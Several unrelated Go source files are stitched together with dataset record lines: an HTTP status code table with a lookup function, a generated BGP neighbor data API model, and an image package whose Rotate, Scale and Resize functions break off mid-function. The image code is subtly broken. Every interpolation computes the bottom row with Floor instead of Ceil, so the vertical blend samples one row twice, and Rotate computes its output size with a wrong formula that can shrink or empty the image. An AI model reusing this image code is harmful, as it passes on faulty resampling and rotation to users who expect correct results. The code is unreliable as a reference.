"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/100",
},
101: {
101,
"Switching Protocols",
"This code is sent in response to an Upgrade request header from the client, and indicates the protocol the server is switching to.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/101",
},
102: {
102,
"Processing",
"This code indicates that the server has received and is processing the request, but no response is available yet.",
"",
},
103: {
103,
"Early Hints",
"This status code is primarily intended to be used with the Link header, letting the user agent start preloading resources while the server prepares a response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/103",
},
200: {
200,
"OK",
`The request has succeeded. The meaning of the success depends on the HTTP method:
GET: The resource has been fetched and is transmitted in the message body.
HEAD: The entity headers are in the message body.
PUT or POST: The resource describing the result of the action is transmitted in the message body.
TRACE: The message body contains the request message as received by the server.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200",
},
201: {
201,
"Created",
"The request has succeeded and a new resource has been created as a result. This is typically the response sent after POST requests, or some PUT requests.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/201",
},
202: {
202,
"Accepted",
"The request has been received but not yet acted upon. It is noncommittal, since there is no way in HTTP to later send an asynchronous response indicating the outcome of the request. It is intended for cases where another process or server handles the request, or for batch processing.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/202",
},
203: {
203,
"Non-Authoritative Information",
`This response code means the returned meta-information is not exactly the same as is available from the origin server, but is collected from a local or a third-party copy. This is mostly used for mirrors or backups of another resource. Except for that specific case, the "200 OK" response is preferred to this status.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/203",
},
204: {
204,
"No Content",
"There is no content to send for this request, but the headers may be useful. The user-agent may update its cached headers for this resource with the new ones.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/204",
},
205: {
205,
"Reset Content",
"Tells the user-agent to reset the document which sent this request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/205",
},
206: {
206,
"Partial Content",
"This response code is used when the Range header is sent from the client to request only part of a resource.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/206",
},
207: {
207,
"Multi-Status",
"Conveys information about multiple resources, for situations where multiple status codes might be appropriate.",
"",
},
208: {
208,
"Already Reported",
"Used inside a <dav:propstat> response element to avoid repeatedly enumerating the internal members of multiple bindings to the same collection.",
"",
},
226: {
226,
"IM Used",
"The server has fulfilled a GET request for the resource, and the response is a representation of the result of one or more instance-manipulations applied to the current instance.",
"",
},
300: {
300,
"Multiple Choice",
"The request has more than one possible response. The user-agent or user should choose one of them. (There is no standardized way of choosing one of the responses, but HTML links to the possibilities are recommended so the user can pick.)",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/300",
},
301: {
301,
"Moved Permanently",
"The URL of the requested resource has been changed permanently. The new URL is given in the response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/301",
},
302: {
302,
"Found",
"This response code means that the URI of requested resource has been changed temporarily. Further changes in the URI might be made in the future. Therefore, this same URI should be used by the client in future requests.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/302",
},
303: {
303,
"See Other",
"The server sent this response to direct the client to get the requested resource at another URI with a GET request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/303",
},
304: {
304,
"Not Modified",
"This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/304",
},
305: {
305,
"Use Proxy",
"Defined in a previous version of the HTTP specification to indicate that a requested response must be accessed by a proxy. It has been deprecated due to security concerns regarding in-band configuration of a proxy.",
"",
},
306: {
306,
"unused",
"This response code is no longer used; it is just reserved. It was used in a previous version of the HTTP/1.1 specification.",
"",
},
307: {
307,
"Temporary Redirect",
"The server sends this response to direct the client to get the requested resource at another URI with same method that was used in the prior request. This has the same semantics as the 302 Found HTTP response code, with the exception that the user agent must not change the HTTP method used: If a POST was used in the first request, a POST must be used in the second request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307",
},
308: {
308,
"Permanent Redirect",
"This means that the resource is now permanently located at another URI, specified by the Location: HTTP Response header. This has the same semantics as the 301 Moved Permanently HTTP response code, with the exception that the user agent must not change the HTTP method used: If a POST was used in the first request, a POST must be used in the second request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308",
},
400: {
400,
"Bad Request",
"The server could not understand the request due to invalid syntax.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/400",
},
401: {
401,
"Unauthorized",
`Although the HTTP standard specifies "unauthorized", semantically this response means "unauthenticated". That is, the client must authenticate itself to get the requested response.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/401",
},
402: {
402,
"Payment Required",
"This response code is reserved for future use. The initial aim for creating this code was using it for digital payment systems, however this status code is used very rarely and no standard convention exists.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/402",
},
403: {
403,
"Forbidden",
"The client does not have access rights to the content; that is, it is unauthorized, so the server is refusing to give the requested resource. Unlike 401, the client's identity is known to the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403",
},
404: {
404,
"Not Found",
"The server can not find the requested resource. In the browser, this means the URL is not recognized. In an API, this can also mean that the endpoint is valid but the resource itself does not exist. Servers may also send this response instead of 403 to hide the existence of a resource from an unauthorized client. This response code is probably the most famous one due to its frequent occurrence on the web.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/404",
},
405: {
405,
"Method Not Allowed",
"The request method is known by the server but has been disabled and cannot be used. For example, an API may forbid DELETE-ing a resource. The two mandatory methods, GET and HEAD, must never be disabled and should not return this error code.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/405",
},
406: {
406,
"Not Acceptable",
"This response is sent when the web server, after performing server-driven content negotiation, doesn't find any content that conforms to the criteria given by the user agent.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/406",
},
407: {
407,
"Proxy Authentication Required",
"This is similar to 401 but authentication is needed to be done by a proxy.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/407",
},
408: {
408,
"Request Timeout",
"This response is sent on an idle connection by some servers, even without any previous request by the client. It means that the server would like to shut down this unused connection. This response is used much more since some browsers, like Chrome, Firefox 27+, or IE9, use HTTP pre-connection mechanisms to speed up surfing. Also note that some servers merely shut down the connection without sending this message.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/408",
},
409: {
409,
"Conflict",
"This response is sent when a request conflicts with the current state of the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/409",
},
410: {
410,
"Gone",
`This response is sent when the requested content has been permanently deleted from server, with no forwarding address. Clients are expected to remove their caches and links to the resource. The HTTP specification intends this status code to be used for "limited-time, promotional services". APIs should not feel compelled to indicate resources that have been deleted with this status code.`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/410",
},
411: {
411,
"Length Required",
"Server rejected the request because the Content-Length header field is not defined and the server requires it.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/411",
},
412: {
412,
"Precondition Failed",
"The client has indicated preconditions in its headers which the server does not meet.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/412",
},
413: {
413,
"Payload Too Large",
"Request entity is larger than limits defined by server; the server might close the connection or return an Retry-After header field.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/413",
},
414: {
414,
"URI Too Long",
"The URI requested by the client is longer than the server is willing to interpret.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/414",
},
415: {
415,
"Unsupported Media Type",
"The media format of the requested data is not supported by the server, so the server is rejecting the request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/415",
},
416: {
416,
"Range Not Satisfiable",
"The range specified by the Range header field in the request can't be fulfilled; it's possible that the range is outside the size of the target URI's data.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/416",
},
417: {
417,
"Expectation Failed",
"This response code means the expectation indicated by the Expect request header field can't be met by the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/417",
},
418: {
418,
"I'm a teapot",
"The server refuses the attempt to brew coffee with a teapot.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/418",
},
421: {
421,
"Misdirected Request",
"The request was directed at a server that is not able to produce a response. This can be sent by a server that is not configured to produce responses for the combination of scheme and authority that are included in the request URI.",
"",
},
422: {
422,
"Unprocessable Entity",
"The request was well-formed but was unable to be followed due to semantic errors.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/422",
},
423: {
423,
"Locked",
"The resource that is being accessed is locked.",
"",
},
424: {
424,
"Failed Dependency",
"The request failed due to failure of a previous request.",
"",
},
425: {
425,
"Too Early",
"Indicates that the server is unwilling to risk processing a request that might be replayed.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/425",
},
426: {
426,
"Upgrade Required",
"The server refuses to perform the request using the current protocol but might be willing to do so after the client upgrades to a different protocol. The server sends an Upgrade header in a 426 response to indicate the required protocol(s).",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/426",
},
428: {
428,
"Precondition Required",
"The origin server requires the request to be conditional. This response is intended to prevent the 'lost update' problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/428",
},
429: {
429,
"Too Many Requests",
`The user has sent too many requests in a given amount of time ("rate limiting").`,
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/429",
},
431: {
431,
"Request Header Fields Too Large",
"The server is unwilling to process the request because its header fields are too large. The request may be resubmitted after reducing the size of the request header fields.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/431",
},
451: {
451,
"Unavailable For Legal Reasons",
"The user-agent requested a resource that cannot legally be provided, such as a web page censored by a government.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/451",
},
500: {
500,
"Internal Server Error",
"The server has encountered a situation it doesn't know how to handle.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/500",
},
501: {
501,
"Not Implemented",
"The request method is not supported by the server and cannot be handled. The only methods that servers are required to support (and therefore that must not return this code) are GET and HEAD.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/501",
},
502: {
502,
"Bad Gateway",
"This error response means that the server, while working as a gateway to get a response needed to handle the request, got an invalid response.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/502",
},
503: {
503,
"Service Unavailable",
"The server is not ready to handle the request. Common causes are a server that is down for maintenance or that is overloaded. Note that together with this response, a user-friendly page explaining the problem should be sent. This responses should be used for temporary conditions and the Retry-After: HTTP header should, if possible, contain the estimated time before the recovery of the service. The webmaster must also take care about the caching-related headers that are sent along with this response, as these temporary condition responses should usually not be cached.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/503",
},
504: {
504,
"Gateway Timeout",
"This error response is given when the server is acting as a gateway and cannot get a response in time.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/504",
},
505: {
505,
"HTTP Version Not Supported",
"The HTTP version used in the request is not supported by the server.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/505",
},
506: {
506,
"Variant Also Negotiates",
"The server has an internal configuration error: the chosen variant resource is configured to engage in transparent content negotiation itself, and is therefore not a proper end point in the negotiation process.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/506",
},
507: {
507,
"Insufficient Storage",
"The method could not be performed on the resource because the server is unable to store the representation needed to successfully complete the request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/507",
},
508: {
508,
"Loop Detected",
"The server detected an infinite loop while processing the request.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/508",
},
510: {
510,
"Not Extended",
"Further extensions to the request are required for the server to fulfil it.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/510",
},
511: {
511,
"Network Authentication Required",
"The 511 status code indicates that the client needs to authenticate to gain network access.",
"https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/511",
},
}
)
// errCodeNotFound is the sentinel error returned when a status code has no
// entry in the corpus.
var errCodeNotFound = errors.New("code not found")
// getDetails looks up the metadata record for the given HTTP status code.
// It returns errCodeNotFound when the code has no entry in the corpus.
func getDetails(code int) (*httpcode, error) {
	if details, found := corpus[code]; found {
		return details, nil
	}
	return nil, errCodeNotFound
}
func getReasonPhrase(code int) (string, error) {
httpCode, err := getDetails(code)
if err != nil {
return "", err
}
return httpCode.reasonPhrase, nil
} | corpus.go | 0.65202 | 0.405949 | corpus.go | starcoder |
package v1
import (
"encoding/json"
)
// BgpNeighborData struct for BgpNeighborData
type BgpNeighborData struct {
// Address Family for IP Address. Accepted values are 4 or 6
AddressFamily *float32 `json:"address_family,omitempty"`
// The customer's ASN. In a local BGP deployment, this will be an internal ASN used to route within the data center. For a global BGP deployment, this will be the your own ASN, configured when you set up BGP for your project.
CustomerAs *float32 `json:"customer_as,omitempty"`
// The device's IP address. For an IPv4 BGP session, this is typically the private bond0 address for the device.
CustomerIp *string `json:"customer_ip,omitempty"`
// True if an MD5 password is configured for the project.
Md5Enabled *bool `json:"md5_enabled,omitempty"`
// The MD5 password configured for the project, if set.
Md5Password *string `json:"md5_password,omitempty"`
// True when the BGP session should be configured as multihop.
Multihop *bool `json:"multihop,omitempty"`
// The Peer ASN to use when configuring BGP on your device.
PeerAs *float32 `json:"peer_as,omitempty"`
// A list of one or more IP addresses to use for the Peer IP section of your BGP configuration. For non-multihop sessions, this will typically be a single gateway address for the device. For multihop sessions, it will be a list of IPs.
PeerIps *[]string `json:"peer_ips,omitempty"`
// A list of project subnets
RoutesIn *[]BgpNeighborDataRoutesIn `json:"routes_in,omitempty"`
// A list of outgoing routes. Only populated if the BGP session has default route enabled.
RoutesOut *[]BgpNeighborDataRoutesOut `json:"routes_out,omitempty"`
}
// NewBgpNeighborData instantiates a new BgpNeighborData object.
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed.
func NewBgpNeighborData() *BgpNeighborData {
	return &BgpNeighborData{}
}
// NewBgpNeighborDataWithDefaults instantiates a new BgpNeighborData object.
// This constructor will only assign default values to properties that have it
// defined, but it doesn't guarantee that properties required by API are set.
func NewBgpNeighborDataWithDefaults() *BgpNeighborData {
	return &BgpNeighborData{}
}
// GetAddressFamily returns the AddressFamily field value if set, zero value otherwise.
func (o *BgpNeighborData) GetAddressFamily() float32 {
	if o != nil && o.AddressFamily != nil {
		return *o.AddressFamily
	}
	var zero float32
	return zero
}
// GetAddressFamilyOk returns a tuple with the AddressFamily field value if set,
// nil otherwise, and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetAddressFamilyOk() (*float32, bool) {
	if o != nil && o.AddressFamily != nil {
		return o.AddressFamily, true
	}
	return nil, false
}
// HasAddressFamily returns a boolean if a field has been set.
func (o *BgpNeighborData) HasAddressFamily() bool {
	return o != nil && o.AddressFamily != nil
}
// SetAddressFamily gets a reference to the given float32 and assigns it to the
// AddressFamily field.
func (o *BgpNeighborData) SetAddressFamily(v float32) {
	value := v
	o.AddressFamily = &value
}
// GetCustomerAs returns the CustomerAs field value if set, zero value otherwise.
func (o *BgpNeighborData) GetCustomerAs() float32 {
if o == nil || o.CustomerAs == nil {
var ret float32
return ret
}
return *o.CustomerAs
}
// GetCustomerAsOk returns a tuple with the CustomerAs field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetCustomerAsOk() (*float32, bool) {
if o == nil || o.CustomerAs == nil {
return nil, false
}
return o.CustomerAs, true
}
// HasCustomerAs returns a boolean if a field has been set.
func (o *BgpNeighborData) HasCustomerAs() bool {
if o != nil && o.CustomerAs != nil {
return true
}
return false
}
// SetCustomerAs gets a reference to the given float32 and assigns it to the CustomerAs field.
func (o *BgpNeighborData) SetCustomerAs(v float32) {
o.CustomerAs = &v
}
// GetCustomerIp returns the CustomerIp field value if set, zero value otherwise.
func (o *BgpNeighborData) GetCustomerIp() string {
if o == nil || o.CustomerIp == nil {
var ret string
return ret
}
return *o.CustomerIp
}
// GetCustomerIpOk returns a tuple with the CustomerIp field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetCustomerIpOk() (*string, bool) {
if o == nil || o.CustomerIp == nil {
return nil, false
}
return o.CustomerIp, true
}
// HasCustomerIp returns a boolean if a field has been set.
func (o *BgpNeighborData) HasCustomerIp() bool {
if o != nil && o.CustomerIp != nil {
return true
}
return false
}
// SetCustomerIp gets a reference to the given string and assigns it to the CustomerIp field.
func (o *BgpNeighborData) SetCustomerIp(v string) {
o.CustomerIp = &v
}
// GetMd5Enabled returns the Md5Enabled field value if set, zero value otherwise.
func (o *BgpNeighborData) GetMd5Enabled() bool {
if o == nil || o.Md5Enabled == nil {
var ret bool
return ret
}
return *o.Md5Enabled
}
// GetMd5EnabledOk returns a tuple with the Md5Enabled field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetMd5EnabledOk() (*bool, bool) {
if o == nil || o.Md5Enabled == nil {
return nil, false
}
return o.Md5Enabled, true
}
// HasMd5Enabled returns a boolean if a field has been set.
func (o *BgpNeighborData) HasMd5Enabled() bool {
if o != nil && o.Md5Enabled != nil {
return true
}
return false
}
// SetMd5Enabled gets a reference to the given bool and assigns it to the Md5Enabled field.
func (o *BgpNeighborData) SetMd5Enabled(v bool) {
o.Md5Enabled = &v
}
// GetMd5Password returns the Md5Password field value if set, zero value otherwise.
func (o *BgpNeighborData) GetMd5Password() string {
if o == nil || o.Md5Password == nil {
var ret string
return ret
}
return *o.Md5Password
}
// GetMd5PasswordOk returns a tuple with the Md5Password field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetMd5PasswordOk() (*string, bool) {
if o == nil || o.Md5Password == nil {
return nil, false
}
return o.Md5Password, true
}
// HasMd5Password returns a boolean if a field has been set.
func (o *BgpNeighborData) HasMd5Password() bool {
if o != nil && o.Md5Password != nil {
return true
}
return false
}
// SetMd5Password gets a reference to the given string and assigns it to the Md5Password field.
func (o *BgpNeighborData) SetMd5Password(v string) {
o.Md5Password = &v
}
// GetMultihop returns the Multihop field value if set, zero value otherwise.
func (o *BgpNeighborData) GetMultihop() bool {
if o == nil || o.Multihop == nil {
var ret bool
return ret
}
return *o.Multihop
}
// GetMultihopOk returns a tuple with the Multihop field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetMultihopOk() (*bool, bool) {
if o == nil || o.Multihop == nil {
return nil, false
}
return o.Multihop, true
}
// HasMultihop returns a boolean if a field has been set.
func (o *BgpNeighborData) HasMultihop() bool {
if o != nil && o.Multihop != nil {
return true
}
return false
}
// SetMultihop gets a reference to the given bool and assigns it to the Multihop field.
func (o *BgpNeighborData) SetMultihop(v bool) {
o.Multihop = &v
}
// GetPeerAs returns the PeerAs field value if set, zero value otherwise.
func (o *BgpNeighborData) GetPeerAs() float32 {
if o == nil || o.PeerAs == nil {
var ret float32
return ret
}
return *o.PeerAs
}
// GetPeerAsOk returns a tuple with the PeerAs field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetPeerAsOk() (*float32, bool) {
if o == nil || o.PeerAs == nil {
return nil, false
}
return o.PeerAs, true
}
// HasPeerAs returns a boolean if a field has been set.
func (o *BgpNeighborData) HasPeerAs() bool {
if o != nil && o.PeerAs != nil {
return true
}
return false
}
// SetPeerAs gets a reference to the given float32 and assigns it to the PeerAs field.
func (o *BgpNeighborData) SetPeerAs(v float32) {
o.PeerAs = &v
}
// GetPeerIps returns the PeerIps field value if set, zero value otherwise.
func (o *BgpNeighborData) GetPeerIps() []string {
if o == nil || o.PeerIps == nil {
var ret []string
return ret
}
return *o.PeerIps
}
// GetPeerIpsOk returns a tuple with the PeerIps field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetPeerIpsOk() (*[]string, bool) {
if o == nil || o.PeerIps == nil {
return nil, false
}
return o.PeerIps, true
}
// HasPeerIps returns a boolean if a field has been set.
func (o *BgpNeighborData) HasPeerIps() bool {
if o != nil && o.PeerIps != nil {
return true
}
return false
}
// SetPeerIps gets a reference to the given []string and assigns it to the PeerIps field.
func (o *BgpNeighborData) SetPeerIps(v []string) {
o.PeerIps = &v
}
// GetRoutesIn returns the RoutesIn field value if set, zero value otherwise.
func (o *BgpNeighborData) GetRoutesIn() []BgpNeighborDataRoutesIn {
if o == nil || o.RoutesIn == nil {
var ret []BgpNeighborDataRoutesIn
return ret
}
return *o.RoutesIn
}
// GetRoutesInOk returns a tuple with the RoutesIn field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetRoutesInOk() (*[]BgpNeighborDataRoutesIn, bool) {
if o == nil || o.RoutesIn == nil {
return nil, false
}
return o.RoutesIn, true
}
// HasRoutesIn returns a boolean if a field has been set.
func (o *BgpNeighborData) HasRoutesIn() bool {
if o != nil && o.RoutesIn != nil {
return true
}
return false
}
// SetRoutesIn gets a reference to the given []BgpNeighborDataRoutesIn and assigns it to the RoutesIn field.
func (o *BgpNeighborData) SetRoutesIn(v []BgpNeighborDataRoutesIn) {
o.RoutesIn = &v
}
// GetRoutesOut returns the RoutesOut field value if set, zero value otherwise.
func (o *BgpNeighborData) GetRoutesOut() []BgpNeighborDataRoutesOut {
if o == nil || o.RoutesOut == nil {
var ret []BgpNeighborDataRoutesOut
return ret
}
return *o.RoutesOut
}
// GetRoutesOutOk returns a tuple with the RoutesOut field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BgpNeighborData) GetRoutesOutOk() (*[]BgpNeighborDataRoutesOut, bool) {
if o == nil || o.RoutesOut == nil {
return nil, false
}
return o.RoutesOut, true
}
// HasRoutesOut returns a boolean if a field has been set.
func (o *BgpNeighborData) HasRoutesOut() bool {
if o != nil && o.RoutesOut != nil {
return true
}
return false
}
// SetRoutesOut gets a reference to the given []BgpNeighborDataRoutesOut and assigns it to the RoutesOut field.
func (o *BgpNeighborData) SetRoutesOut(v []BgpNeighborDataRoutesOut) {
o.RoutesOut = &v
}
// MarshalJSON serializes only the fields that are non-nil, matching the
// omitempty semantics of the API payload.
func (o BgpNeighborData) MarshalJSON() ([]byte, error) {
	fields := make(map[string]interface{})
	// include adds key -> val only when the field is actually set.
	include := func(key string, set bool, val interface{}) {
		if set {
			fields[key] = val
		}
	}
	include("address_family", o.AddressFamily != nil, o.AddressFamily)
	include("customer_as", o.CustomerAs != nil, o.CustomerAs)
	include("customer_ip", o.CustomerIp != nil, o.CustomerIp)
	include("md5_enabled", o.Md5Enabled != nil, o.Md5Enabled)
	include("md5_password", o.Md5Password != nil, o.Md5Password)
	include("multihop", o.Multihop != nil, o.Multihop)
	include("peer_as", o.PeerAs != nil, o.PeerAs)
	include("peer_ips", o.PeerIps != nil, o.PeerIps)
	include("routes_in", o.RoutesIn != nil, o.RoutesIn)
	include("routes_out", o.RoutesOut != nil, o.RoutesOut)
	return json.Marshal(fields)
}
// NullableBgpNeighborData wraps a BgpNeighborData pointer together with an
// explicit "set" flag, so an intentional JSON null can be distinguished from
// an absent value.
type NullableBgpNeighborData struct {
	value *BgpNeighborData // wrapped value; nil encodes as JSON null
	isSet bool             // true once Set or UnmarshalJSON has run
}
// Get returns the wrapped BgpNeighborData value (nil when unset or null).
func (v NullableBgpNeighborData) Get() *BgpNeighborData {
	return v.value
}
// Set stores val as the wrapped value and marks it as explicitly set.
func (v *NullableBgpNeighborData) Set(val *BgpNeighborData) {
	v.value = val
	v.isSet = true
}
// IsSet reports whether a value (possibly nil, i.e. JSON null) has been set.
func (v NullableBgpNeighborData) IsSet() bool {
	return v.isSet
}
// Unset clears the wrapped value and the set flag.
func (v *NullableBgpNeighborData) Unset() {
	v.value = nil
	v.isSet = false
}
// NewNullableBgpNeighborData returns a NullableBgpNeighborData wrapping val,
// marked as set.
func NewNullableBgpNeighborData(val *BgpNeighborData) *NullableBgpNeighborData {
	return &NullableBgpNeighborData{value: val, isSet: true}
}
// MarshalJSON encodes the wrapped value; a nil value serializes as JSON null.
func (v NullableBgpNeighborData) MarshalJSON() ([]byte, error) {
	return json.Marshal(v.value)
}
func (v *NullableBgpNeighborData) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | v1/model_bgp_neighbor_data.go | 0.824144 | 0.426083 | model_bgp_neighbor_data.go | starcoder |
package aips
import (
"image"
"image/color"
"math"
)
func Rotate(src image.Image, ang float64) image.Image {
// 计算旋转后保留完整图像的宽和高
cosA, sinA := math.Cos(-ang), math.Sin(-ang)
srcRect := src.Bounds()
srcWidth := srcRect.Dx()
srcHeight := srcRect.Dy()
dstWidth := int(math.Abs(float64(srcWidth)*cosA - float64(srcHeight)*sinA + 0.5))
dstHeight := int(math.Abs(float64(-srcWidth)*cosA + float64(srcHeight)*sinA + 0.5))
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
// 计算新图片
rx, ry := float64(srcWidth)/2, float64(srcHeight)/2
dx, dy := float64(dstWidth)/2, float64(dstHeight)/2
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
// 反向映射
sx := (float64(x)-dx)*cosA - (float64(y)-dy)*(-sinA) + rx
sy := (float64(x)-dx)*(-sinA) + (float64(y)-dy)*cosA + ry
Lf, Rf, Tf, Bf := math.Floor(sx), math.Ceil(sx), math.Floor(sy), math.Floor(sy)
Li, Ri, Ti, Bi := int(Lf), int(Rf), int(Tf), int(Bf)
r1, g1, b1, a1 := src.At(Li, Ti).RGBA()
r2, g2, b2, a2 := src.At(Ri, Ti).RGBA()
r3, g3, b3, a3 := src.At(Li, Bi).RGBA()
r4, g4, b4, a4 := src.At(Ri, Bi).RGBA()
r1f, g1f, b1f, a1f := float64(r1), float64(g1), float64(b1), float64(a1)
r2f, g2f, b2f, a2f := float64(r2), float64(g2), float64(b2), float64(a2)
r3f, g3f, b3f, a3f := float64(r3), float64(g3), float64(b3), float64(a3)
r4f, g4f, b4f, a4f := float64(r4), float64(g4), float64(b4), float64(a4)
p1 := (1 - sx + Lf) * (1 - sy + Tf)
p2 := (sx - Lf) * (1 - sy + Tf)
p3 := (1 - sx + Lf) * (sy - Tf)
p4 := (sx - Lf) * (sy - Tf)
r := p1*r1f + p2*r2f + p3*r3f + p4*r4f
g := p1*g1f + p2*g2f + p3*g3f + p4*g4f
b := p1*b1f + p2*b2f + p3*b3f + p4*b4f
a := p1*a1f + p2*a2f + p3*a3f + p4*a4f
dst.Set(x, y, color.RGBA64{uint16(r + 0.5), uint16(g + 0.5), uint16(b + 0.5), uint16(a + 0.5)})
}
}
return dst
}
func Scale(src image.Image, zoomx float64, zoomy float64) image.Image {
srcRect := src.Bounds()
srcWidth := srcRect.Dx()
srcHeight := srcRect.Dy()
dstWidth := int(float64(srcWidth) * zoomx)
dstHeight := int(float64(srcHeight) * zoomy)
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
// 反向映射
sx := float64(x) / zoomx
sy := float64(y) / zoomy
Lf, Rf, Tf, Bf := math.Floor(sx), math.Ceil(sx), math.Floor(sy), math.Floor(sy)
Li, Ri, Ti, Bi := int(Lf), int(Rf), int(Tf), int(Bf)
r1, g1, b1, a1 := src.At(Li, Ti).RGBA()
r2, g2, b2, a2 := src.At(Ri, Ti).RGBA()
r3, g3, b3, a3 := src.At(Li, Bi).RGBA()
r4, g4, b4, a4 := src.At(Ri, Bi).RGBA()
r1f, g1f, b1f, a1f := float64(r1), float64(g1), float64(b1), float64(a1)
r2f, g2f, b2f, a2f := float64(r2), float64(g2), float64(b2), float64(a2)
r3f, g3f, b3f, a3f := float64(r3), float64(g3), float64(b3), float64(a3)
r4f, g4f, b4f, a4f := float64(r4), float64(g4), float64(b4), float64(a4)
p1 := (1 - sx + Lf) * (1 - sy + Tf)
p2 := (sx - Lf) * (1 - sy + Tf)
p3 := (1 - sx + Lf) * (sy - Tf)
p4 := (sx - Lf) * (sy - Tf)
r := p1*r1f + p2*r2f + p3*r3f + p4*r4f
g := p1*g1f + p2*g2f + p3*g3f + p4*g4f
b := p1*b1f + p2*b2f + p3*b3f + p4*b4f
a := p1*a1f + p2*a2f + p3*a3f + p4*a4f
dst.Set(x, y, color.RGBA64{uint16(r + 0.5), uint16(g + 0.5), uint16(b + 0.5), uint16(a + 0.5)})
}
}
return dst
}
func Resize(src image.Image, dstWidth int, dstHeight int) image.Image {
srcRect := src.Bounds()
srcWidth := srcRect.Dx()
srcHeight := srcRect.Dy()
dstRect := image.Rect(0, 0, dstWidth, dstHeight)
dst := image.NewRGBA(dstRect)
zoomx := float64(dstWidth) / float64(srcWidth)
zoomy := float64(dstHeight) / float64(srcHeight)
for x := 0; x < dstWidth; x += 1 {
for y := 0; y < dstHeight; y += 1 {
// 反向映射
sx := float64(x) / zoomx
sy := float64(y) / zoomy
Lf, Rf, Tf, Bf := math.Floor(sx), math.Ceil(sx), math.Floor(sy), math.Floor(sy)
Li, Ri, Ti, Bi := int(Lf), int(Rf), int(Tf), int(Bf)
r1, g1, b1, a1 := src.At(Li, Ti).RGBA()
r2, g2, b2, a2 := src.At(Ri, Ti).RGBA()
r3, g3, b3, a3 := src.At(Li, Bi).RGBA()
r4, g4, b4, a4 := src.At(Ri, Bi).RGBA()
r1f, g1f, b1f, a1f := float64(r1), float64(g1), float64(b1), float64(a1)
r2f, g2f, b2f, a2f := float64(r2), float64(g2), float64(b2), float64(a2)
r3f, g3f, b3f, a3f := float64(r3), float64(g3), float64(b3), float64(a3)
